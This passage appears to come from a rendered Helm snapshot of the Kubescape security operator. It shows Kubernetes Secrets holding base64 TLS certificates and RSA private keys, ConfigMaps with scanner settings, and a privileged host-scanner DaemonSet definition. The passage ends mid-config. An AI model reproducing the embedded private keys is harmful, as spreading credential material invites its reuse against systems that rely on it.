LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMzFENjV6WGVoZzBKd0ZIS1pBYXBuNUhtYUwycVdyaE9tVllNTUJPVlVyU2VIdGgwCjZVUHRNbUVXZFhrM2ZCUURUbEtZTWJBVERPMm4vVmdZMnRjRFlhM0ZRUFVNdmlRWHVRN21Ud29kVnJ1YkpKUVkKeldBeWR2aUVRdDk4dlVLeFQ1L2NGT1pyRUs1UGVSeXJjUzNJWHZnQWpMR3J6UlI3RG5kcmtuV0JhTHNVcXp0Ngp6b3E3bjVLSXlndm5yU3YrTCtOejkrb3FRKzB3UWFnTVpoL3FqRDBoR21xS0N2VkhtWUJsRUIvMlgrSGV4UTJXClV5SkV1Tis2L0xWYkpKaktueFZkQlMra0JFL0pXSUFad2xDbDI4Z3FRN1AweDVoK3JldHpqZ2VVemJFUGNORFkKYmhSdUYxOVNzSGM1MlRib2EwWk9jUE1ic3NrbC9kRDdRUkYwQ1FJREFRQUJBb0lCQUNaSWVLcllaa3h1d2NReApnVlBDZktPNVhGbUtZa0RwSmJoTnN3c3U0RU5zYVVyNmFwaHVwNlFpVnJwT3pIODk0dzh6UTVvSkNFc0lGdXRzCmhkNUdTL01iMmh2M3BuYVdNMmJyTWZwTXpwakcwcUxqckpqUXEvWVBSb1U4VU9NVkl0WjJua0VLKzBIQjBDZ0EKRFRmNjFFWExtRFNHWk9Ca2FYQWljdE9KeDJTUGs4RTJxaUJHVEEvSmorNmdOWHJod2V0SndvbW9jRzhsSG1tdQpzYzhnZlJrcnJuR2dmZ1dDWDEwM0czcGRqTGwzT0dtQ0xHRWVnV1ZUKzYzUExncFJnT29vbmkxcFBOdVRlbkpRCks2MFozVWJFVWt2VmJtWXBtMWRGR2hQMDBlZ1VWY3NzK242UEEzUlgwdDRocmpQQnYyYjJQOTVwQVVLOHkwN2kKdGY3bkZEMENnWUVBNWNSaDExSXh4anZDemYrZkJ0OUtNb2NmWjY0LytZVGFFTml1dzlMSk5kT3I4M01FM0wvOQpnTGpTbmsvS2p4eVM5OEV5WFZMSFduSm5yYlBxeWdrYmJvT3Zxejd6UjhWbUZHQURnQzlXMzc3SUJJRzByME54CnZKTnNYeFlXS2RKWm8wMzcrMGFvcUU1VmhSQXZqYTJhUm9QSDdmWVRlcFdoQ0JFMnFNQ2NwS2NDZ1lFQStOQU4KL2pLcndVYktiVXFkb3p3TDdtZ2hJZXpFWG80N1daWks1RHIzMGZhTXhFTU1vekxaOC9VbkVxbk1OUXJZamhaMQppQld2ZGthZXJJUm5DcEZmS2NIKzhlcUdPZWxkNmloa09CekxwWVBYdVVzUGp1VnNwMnlKMllyeTV2Q0pFMnMwCmI0VERiZ2RPVU5RYkFTYmxjK0lmeGdXWTR2TEdDNURwYWpzU1I4OENnWUE2M1VNTHZQMFBna1A0THFMNVNiOWkKam9lWE1tY2xiOG5HUXgwVEFpK1dZTEpPM29yQ1cxV0E0dGppd2lKczQ2OHJWZzJuSnd2M3VoT2h4dFJDQ205QwpzdTRRZTBJc2d3QVIvRDhwV2ZkeHZ4alRQcitobnkvR1ZpYVBmY01UMTlZckpsR0dJS1lZNkdpMGZGOFNkd1Z0ClIxbXpOelhxVStjN2Y5MTNBbEdmUlFLQmdRQ083WDFNUzdGTVdxMEg4VGZ5d0JpZWdDU2dSMUZhZTl2dUQ1Ni8KMG52dm1mQ3RBVk11SUpVQlJnK0c4aEZEV3hLaE5KZVpiOU9XWHVUaGQwRjEyYUpQNjRmWFVnQi9IZVo4RDIzYQpxZmYyQVhHWG1GMjhtV0E4SU9aakdDV0dzaUFjRHBaVmhXOTZNaW96MWxRWTZrNGVyb1BRRGdFUVJhT3NtemJxCmRqcC9Fd0tCZ1FDd2xlZWpEbkpWN3lJY0J0MElLWUtEdFVPS0RINm5ZbFltTUxrWkZtazBsSW1HRGw4cElpRXcKVTFrZ0lVcnZ5VHBmb3QzdFk3NXVFTW5KSGYvSkFHWkFCNnlHa2dVRzZvRmRQN0N5YUJLMjRSYndUTUk3WmpreQpFUXFvSWVwKzdIUWt6dy9QRzB2VmtZTTQ1KzIrc24renZHeXNYdTVOdFltdEp6cjVFQ3ZicFE9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ== + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQWt5Z0F3SUJBZ0lRS0VWZE13bGF5QUU5R2hmeERNRWQzekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1EQXhMakFzQmdOVkJBTVRKV3QxWW1WelkyRndaUzFoWkcxcGMzTnBiMjR0ZDJWaWFHOXZheTVvCmIyNWxlUzV6ZG1Nd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURmVVBybk5kNkcKRFFuQVVjcGtCcW1ma2Vab3ZhcGF1RTZaVmd3d0U1VlN0SjRlMkhUcFErMHlZUloxZVRkOEZBTk9VcGd4c0JNTQo3YWY5V0JqYTF3TmhyY1ZBOVF5K0pCZTVEdVpQQ2gxV3U1c2tsQmpOWURKMitJUkMzM3k5UXJGUG45d1U1bXNRCnJrOTVIS3R4TGNoZStBQ01zYXZORkhzT2QydVNkWUZvdXhTck8zck9pcnVma29qS0MrZXRLLzR2NDNQMzZpcEQKN1RCQnFBeG1IK3FNUFNFYWFvb0s5VWVaZ0dVUUgvWmY0ZDdGRFpaVElrUzQzN3I4dFZza21NcWZGVjBGTDZRRQpUOGxZZ0JuQ1VLWGJ5Q3BEcy9USG1INnQ2M09PQjVUTnNROXcwTmh1Rkc0WFgxS3dkem5aTnVoclJrNXc4eHV5CnlTWDkwUHRCRVhRSkFnTUJBQUdqZ1pNd2daQXdEZ1lEVlIwUEFRSC9CQVFEQWdXZ01CMEdBMVVkSlFRV01CUUcKQ0NzR0FRVUZCd01CQmdnckJnRUZCUWNEQWpBTUJnTlZIUk1CQWY4RUFqQUFNQjhHQTFVZEl3UVlNQmFBRk54aApoU3I0ZmhScnVScFpabnlSWUpRanA1WjhNREFHQTFVZEVRUXBNQ2VDSld0MVltVnpZMkZ3WlMxaFpHMXBjM05wCmIyNHRkMlZpYUc5dmF5NW9iMjVsZVM1emRtTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBQmQ3NXhRV2RaeUQKTVF3a09YSkdBZ1h2VTAxUXh2SmhvMTZZMlVlbjk5T2o2SzBRVjNrRkRnUE15MEo0RHdGdkhiNjhLK0s3YnpuWgoxN1RzTlJwbmQxNDR2OElwUW0rL2JHYThmQkJibnJTeTZJWUZzejZrUkFMdERONXJGM0IzT3JsOE9NMFNna3RYCkNrdVc2ZGNOdXBnOTUyTXNVdDJCL2g5Z2lDbXY4N05VRWZXNUZJOGZ1amtTbktxT2lvSXpKek44NURLSENxOEMKOFZhbFJEMXZ4cDdZK3NRT2dqOTJmY1dXQUlYZDRlZnBkS1dNNHJCWGJhSUVKdGNPK3dNV0dvdU5iY2t3bTQxZQphZkR0V3J1eWx5M1RVRDY1NUpQSDVoZFFnNkFNNlRlNzQ2NGtRUElRSmN1R0R4U1dPTjVJaW5ncjlzTlRGUVhzClc5NlRVWjhDSzU0PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: v1 +kind: Secret +metadata: + name: storage-ca + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURjekNDQWx1Z0F3SUJBZ0lSQU1Hd29nRElPWXh1c01nTGNHZnlIR2N3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dKekVsTUNNR0ExVUVBeE1jYzNSdmNtRm5aUzVvYjI1bGVTNXpkbU10ClNVUlRSakJMTkhaa09EQ0NBU0l3RFFZSktvWklodmNOQVFFQkJRQURnZ0VQQURDQ0FRb0NnZ0VCQU5wcWptbk8KaSthZ0FjbkZKY0h5bGRxa1pVdXFMNTZDbThja0t1MlpwV3p5LzF3RlJST1pGL09qQTlaWWl5aUVFc0tqbVpFaQpVRmRNY2FRQ0I1Qm5hSWdzQThUc2dRSXlpNEVLa3MzQUhIME03QXpFc3gxc3ZZRTYrRUkyYmNqUUZqelp5Nm1yClp2OEs5VGhWSVVQMDNDSG1kbkFXbERHN3Mva2VINWE3eEVaSUFIYTBrK3ljVk5uVmtyK1EzVTRwUUpSNUZhU04KMzR3NDcyUWdDc21DcSt3QlA4WjRFT3hsYWszT3hneUpYZ0ZiU0lnaXAwZTgrS1pSVWRxZTJTWXppUVRNYldBQgpVNmJoaDFrZTdGUElMV1VTelQxaGl2N1o4UEc5ZjdSQ1VJTW5JTjY4Z2pHODFIdGkzRFlvOHN2OEFOMlRhcTlQClFWNDBpN3lVMHlvT2VTa0NBd0VBQWFPQm9EQ0JuVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdIUVlEVlIwbEJCWXcKRkFZSUt3WUJCUVVIQXdFR0NDc0dBUVVGQndNQ01Bd0dBMVVkRXdFQi93UUNNQUF3SHdZRFZSMGpCQmd3Rm9BVQpTa0ppbzVsQ3BPYzNGb0YzclR3UkxoMkVhL3N3UFFZRFZSMFJCRFl3TklJUmMzUnZjbUZuWlM1b2IyNWxlUzV6CmRtT0NIM04wYjNKaFoyVXVhRzl1WlhrdWMzWmpMbU5zZFhOMFpYSXViRzlqWVd3d0RRWUpLb1pJaHZjTkFRRUwKQlFBRGdnRUJBRGxpRVJ5ZFF4c2VSSWgyTmgwa2drQldxc2NpbEZpaUxYR1VnV1BkQmtaS1dzNUZ6VS9vSVdpeQo5K2k2aHZxM3ZOOEhCTDdENXg1TldOTU8wa08zUzVDa0NYN2g3ank5UE9IMUowNFRDTmRkQ0I1VzRxWnJyOGhxCjlWa3B5eVFHWTRRRTh1UTBxSzJ4L2M3UGllbXNRbkl0czFpT1llclJVNkJqK1ptSjZxc0J3Ykdab0l0NmQ4ZHEKNWp6MUhQZFZhSDlDVGw4ZkxLSk1ibHJFK2ovU1lsKzUyWWVRNVI1T0IzZ1BZT1JUVHg1dERsSXVVT3JPaXRNbwpyYjNyVDB6WW9TdlRvVmpMM09WYzdrS1QyNm9oNHZ3N2dlS0hVTGYySkpUWEk0MCtUL1RpYWtPRi9odERUWm85CndyMkI0UGw1YWdtbHFoYUQxWHpoQXBnRU9ybktvU2c9Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb0FJQkFBS0NBUUVBMm1xT2FjNkw1cUFCeWNVbHdmS1YycVJsUzZvdm5vS2J4eVFxN1ptbGJQTC9YQVZGCkU1a1g4Nk1EMWxpTEtJUVN3cU9aa1NKUVYweHhwQUlIa0dkb2lDd0R4T3lCQWpLTGdRcVN6Y0FjZlF6c0RNU3oKSFd5OWdUcjRRalp0eU5BV1BObkxxYXRtL3dyMU9GVWhRL1RjSWVaMmNCYVVNYnV6K1I0ZmxydkVSa2dBZHJTVAo3SnhVMmRXU3Y1RGRUaWxBbEhrVnBJM2ZqRGp2WkNBS3lZS3I3QUUveG5nUTdHVnFUYzdHRElsZUFWdElpQ0tuClI3ejRwbEZSMnA3WkpqT0pCTXh0WUFGVHB1R0hXUjdzVThndFpSTE5QV0dLL3RudzhiMS90RUpRZ3ljZzNyeUMKTWJ6VWUyTGNOaWp5eS93QTNaTnFyMDlCWGpTTHZKVFRLZzU1S1FJREFRQUJBb0gvQkVRUWhBQ0V1dnhsREl2TgpNUHlMOExsRlFUVVJ1UWJVQkErd3h2TTVSK2QzRlZVRkJGejVHc2tVU2h0d25GbjRBOVV1S3FlQTZqT1VCS0FGCmhjeC9QaW1kNlRxMVNsV3lZOUxSQ3pPMVdydmw0Rm4zSlp2NkY0d1BUVHZDNlNrblJnajY4VlZuclpPSk5wQnoKRmVDeWEvY1VXUndYeU9EaG92dnpvZjRJMTFhSGJEZWVES0lFdFNXRExmL29jaVBWRWhCcERzdzZzQW5iMDFCdAowK2VlVTczUFordHJGazFKZGVWcnoyVG1MUmJyVnpvNDlJYXJYaGVGRE9yT0s5T24vdkNnbEQ0T2NpRGFtUG14CjhEMzVkY1V6T2tXeWZZY0t0UlBMRDRpU3lKL2NSQnlKQllPQkxydG1BTTZmWEVuSVN3ZEJoLzhrNjlyVkZ0V0cKMlBLUkFvR0JBUGlRcVVIUXNyaHdlODRIbzBTUG5hY3NYT1ByQ3o5Z0ZSTVhCS2IrS210UFljL3dLUlAvZHI4Wgp2S3pPUzlCdFg1eU5ia3ZXUmJZMG5lYUlIN2FFcXV0MENVcUJZYnNSSDg4Wndndi95WmlBUGlyUUdGNXpaT3FyClFVOGRWSkpDNXI0a1VWQ2RBZ2o4QlRobjZIR0RxRW5OTHdjaTNZclAzT1VGWmR6UEg5bWxBb0dCQU9EekNVUjEKZjc0dHRPYzNUNEh2U2lnNk5zVVZRTHFFMUxBUkRseUhEalM5WlRVWFYveVUyNFFxc2NIaFRIQmhYUytNeXJoKwpWMGZrVXNwdlUxRk45OW5Zb3p0KzVYVlpHTVpJR3JHS2FYRHg1Z2p1czJ2bVdjY05MMXk1WnVFMkgyaFZkVjM0Cm45c00yWDRxSUhpelRHWWFGUk95dFllT1pFTXVxUWFwREtJMUFvR0FCZE5lSkN6QUE1S2ZWRFRabnNHKzhDd2EKQVQyQkJmczZnemdHNCtNUkczTEEyQjdJMTY4bEdWV0JGb3UvT3lOVkdsWTJQNURHRVg4cU5EejhnVXFhdHVvQgpUYjI2aktmYUZ3Q0RpOFJ5OVNBTVZQU0xuYXNXc21sUkhvbVJjZHdmakZWTmtwWWJkaHB5Qk9CcWtqNkRzemNiCjR3N3VJbEs4MnFGRndlY1kyQUVDZ1lCTHR5STRhOEE2bUJIYS9aQUNjVE9weEtab3dkV09zbVVRZWowMlFiTXoKWjBob2pWbnRSNEYzeEJNZTZpR2JkZm95cGhZWjhWU1pleTJ1dTdmMGx1VEU2NWxOemxHWHBReWt1T0piUGZadApzTTQzMVhpSTZmanYrZTBtTGJXR09ueHAxdEh4ZGwwQUV4d2x6akl0emxQNXplK29PSy9IVjlOQmxiUUk3TisyCnZRS0JnSEhrbDVPcDhkVWdkYTNzS0lLNzduK0JwUUJrcWdsQ1dMTkdkZFhOLyt2MUVpU01XUFNQOGdqa2xPb1gKYkRWUUVCSS9XVERXdUE2Nno2WEVLWHJjWkJRRWtUdjR2TWNFUmozSEloVWNoNDVBNnArZmc1RlhrOVFZQUVpcgoyUGYyUmU1elNhL0JvY0NjN3FFL1BtZjBNVjdzT0FXaWdsemFNeEVRTjUzaXdGd2IKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K + ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-cloud-config + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + kubescape.io/infra: config +data: + clusterData: "{\n \"serviceDiscovery\": false,\n \"vulnScanURL\": \"kubevuln:8080\"\ + ,\n \"kubevulnURL\": \"kubevuln:8080\",\n \"kubescapeURL\": \"kubescape:8080\"\ + ,\n \"clusterName\": \"bobexample\",\n \"storage\": true,\n \"relevantImageVulnerabilitiesEnabled\"\ + : true,\n \"namespace\": \"honey\",\n \"imageVulnerabilitiesScanningEnabled\"\ + : true,\n \"postureScanEnabled\": true,\n \"otelCollector\": false,\n \"nodeAgent\"\ + : \"true\",\n \"maxImageSize\": 5.36870912e+09,\n \"maxSBOMSize\": 2.097152e+07,\n\ + \ \"keepLocal\": true,\n \"scanTimeout\": \"5m\",\n \"scanEmbeddedSBOMs\":\ + \ false,\n \"vexGeneration\": false,\n \"useDefaultMatchers\": false,\n \"\ + storeFilteredSbom\": false,\n \"continuousPostureScan\": false,\n \"relevantImageVulnerabilitiesConfiguration\"\ + : \"enable\"\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-capabilities + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-capabilities + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-capabilities + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + capabilities: "{\n \"capabilities\":{\"admissionController\":\"enable\",\"autoUpgrading\"\ + :\"disable\",\"configurationScan\":\"enable\",\"continuousScan\":\"disable\",\"\ + httpDetection\":\"enable\",\"kubescapeOffline\":\"disable\",\"malwareDetection\"\ + :\"disable\",\"manageWorkloads\":\"disable\",\"networkEventsStreaming\":\"disable\"\ + ,\"networkPolicyService\":\"enable\",\"nodeProfileService\":\"enable\",\"nodeSbomGeneration\"\ + :\"enable\",\"nodeScan\":\"enable\",\"operator\":\"enable\",\"prometheusExporter\"\ + :\"enable\",\"relevancy\":\"enable\",\"runtimeDetection\":\"enable\",\"runtimeObservability\"\ + :\"enable\",\"scanEmbeddedSBOMs\":\"disable\",\"seccompProfileBackend\":\"crd\"\ + ,\"seccompProfileService\":\"enable\",\"syncSBOM\":\"disable\",\"testing\":{\"\ + nodeAgentMultiplication\":{\"enabled\":false,\"replicas\":5}},\"vexGeneration\"\ + :\"disable\",\"vulnerabilityScan\":\"enable\"},\n \"components\":{\"autoUpdater\"\ + :{\"enabled\":false},\"clamAV\":{\"enabled\":false},\"cloudSecret\":{\"create\"\ + :true,\"name\":\"cloud-secret\"},\"customCaCertificates\":{\"name\":\"custom-ca-certificates\"\ + },\"hostScanner\":{\"enabled\":true},\"kubescape\":{\"enabled\":true},\"kubescapeScheduler\"\ + :{\"enabled\":true},\"kubevuln\":{\"enabled\":true},\"kubevulnScheduler\":{\"\ + enabled\":true},\"nodeAgent\":{\"enabled\":true},\"operator\":{\"enabled\":true},\"\ + otelCollector\":{\"enabled\":false},\"prometheusExporter\":{\"enabled\":true},\"\ + serviceDiscovery\":{\"enabled\":false},\"storage\":{\"enabled\":true},\"synchronizer\"\ + :{\"enabled\":false}},\n \"configurations\":{\"excludeJsonPaths\":null,\"otelUrl\"\ + :null,\"persistence\":\"enable\",\"priorityClass\":{\"daemonset\":100000100,\"\ + enabled\":true},\"prometheusAnnotations\":\"disable\"} ,\n \"serviceScanConfig\"\ + \ :{\"enabled\":false,\"interval\":\"1h\"}\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: cs-matching-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + matchingRules.json: '{"match":[{"apiGroups":["apps"],"apiVersions":["v1"],"resources":["deployments"]}],"namespaces":["default"]} + + ' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"CommandName":"kubescapeScan","args":{"scanV1":{}}}]}' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: host-scanner-definition + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + host-scanner-yaml: "apiVersion: apps/v1\nkind: DaemonSet\nmetadata:\n name: host-scanner\n\ + \ namespace: honey\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\n\ + \ labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n tier:\ + \ ks-control-plane\n kubescape.io/ignore: \"true\"\nspec:\n selector:\n \ + \ matchLabels:\n app.kubernetes.io/name: kubescape-operator\n app.kubernetes.io/instance:\ + \ kubescape\n app.kubernetes.io/component: host-scanner\n template:\n \ + \ metadata:\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\ + \n labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n\ + \ tier: ks-control-plane\n kubescape.io/ignore: \"true\"\n \ + \ kubescape.io/tier: \"core\"\n name: host-scanner\n spec:\n \ + \ nodeSelector:\n kubernetes.io/os: linux\n affinity:\n tolerations:\n\ + \ - effect: NoSchedule\n key: node-role.kubernetes.io/control-plane\n\ + \ operator: Exists\n - effect: NoSchedule\n key: node-role.kubernetes.io/master\n\ + \ operator: Exists\n containers:\n - name: host-sensor\n \ + \ image: \"quay.io/kubescape/host-scanner:v1.0.78\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ true\n privileged: true\n readOnlyRootFilesystem: true\n \ + \ env:\n - name: KS_LOGGER_LEVEL\n value: \"info\"\n \ + \ - name: KS_LOGGER_NAME\n value: \"zap\"\n ports:\n \ + \ - name: scanner # Do not change port name\n containerPort: 7888\n\ + \ protocol: TCP\n resources:\n limits:\n \ + \ cpu: 0.4m\n memory: 400Mi\n requests:\n cpu:\ + \ 0.1m\n memory: 200Mi\n volumeMounts:\n - mountPath:\ + \ /host_fs\n name: host-filesystem\n startupProbe:\n \ + \ httpGet:\n path: /readyz\n port: 7888\n failureThreshold:\ + \ 30\n periodSeconds: 1\n livenessProbe:\n httpGet:\n\ + \ path: /healthz\n port: 7888\n periodSeconds:\ + \ 10\n terminationGracePeriodSeconds: 120\n dnsPolicy: ClusterFirstWithHostNet\n\ + \ serviceAccountName: node-agent\n automountServiceAccountToken: false\n\ + \ volumes:\n - hostPath:\n path: /\n type: Directory\n\ + \ name: host-filesystem\n hostPID: true\n hostIPC: true" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-scheduler + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"commandName":"scan","designators":[{"designatorType":"Attributes","attributes":{}}]}]}' +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"applicationProfileServiceEnabled\": true,\n \"backendStorageEnabled\"\ + : false,\n \"prometheusExporterEnabled\": true,\n \"runtimeDetectionEnabled\"\ + : true,\n \"httpDetectionEnabled\": true,\n \"networkServiceEnabled\": true,\n\ + \ \"malwareDetectionEnabled\": false,\n \"hostMalwareSensorEnabled\": false,\n\ + \ \"hostNetworkSensorEnabled\": false,\n \"nodeProfileServiceEnabled\":\ + \ false,\n \"networkStreamingEnabled\": false,\n \"maxImageSize\": 5.36870912e+09,\n\ + \ \"maxSBOMSize\": 2.097152e+07,\n \"sbomGenerationEnabled\": true,\n \ + \ \"enableEmbeddedSBOMs\": false,\n \"seccompServiceEnabled\": true,\n \ + \ \"seccompProfileBackend\": \"crd\",\n \"initialDelay\": \"2m\",\n \"updateDataPeriod\"\ + : \"10000m\",\n \"nodeProfileInterval\": \"10m\",\n \"networkStreamingInterval\"\ + : \"2m\",\n \"maxSniffingTimePerContainer\": \"2m\",\n \"excludeNamespaces\"\ + : \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"excludeLabels\":null,\n \"exporters\": {\n \"alertManagerExporterUrls\"\ + :[],\n \"stdoutExporter\":true,\n \"syslogExporterURL\": \"\"\n },\n\ + \ \"excludeJsonPaths\":null,\n \"ruleCooldown\": {\n 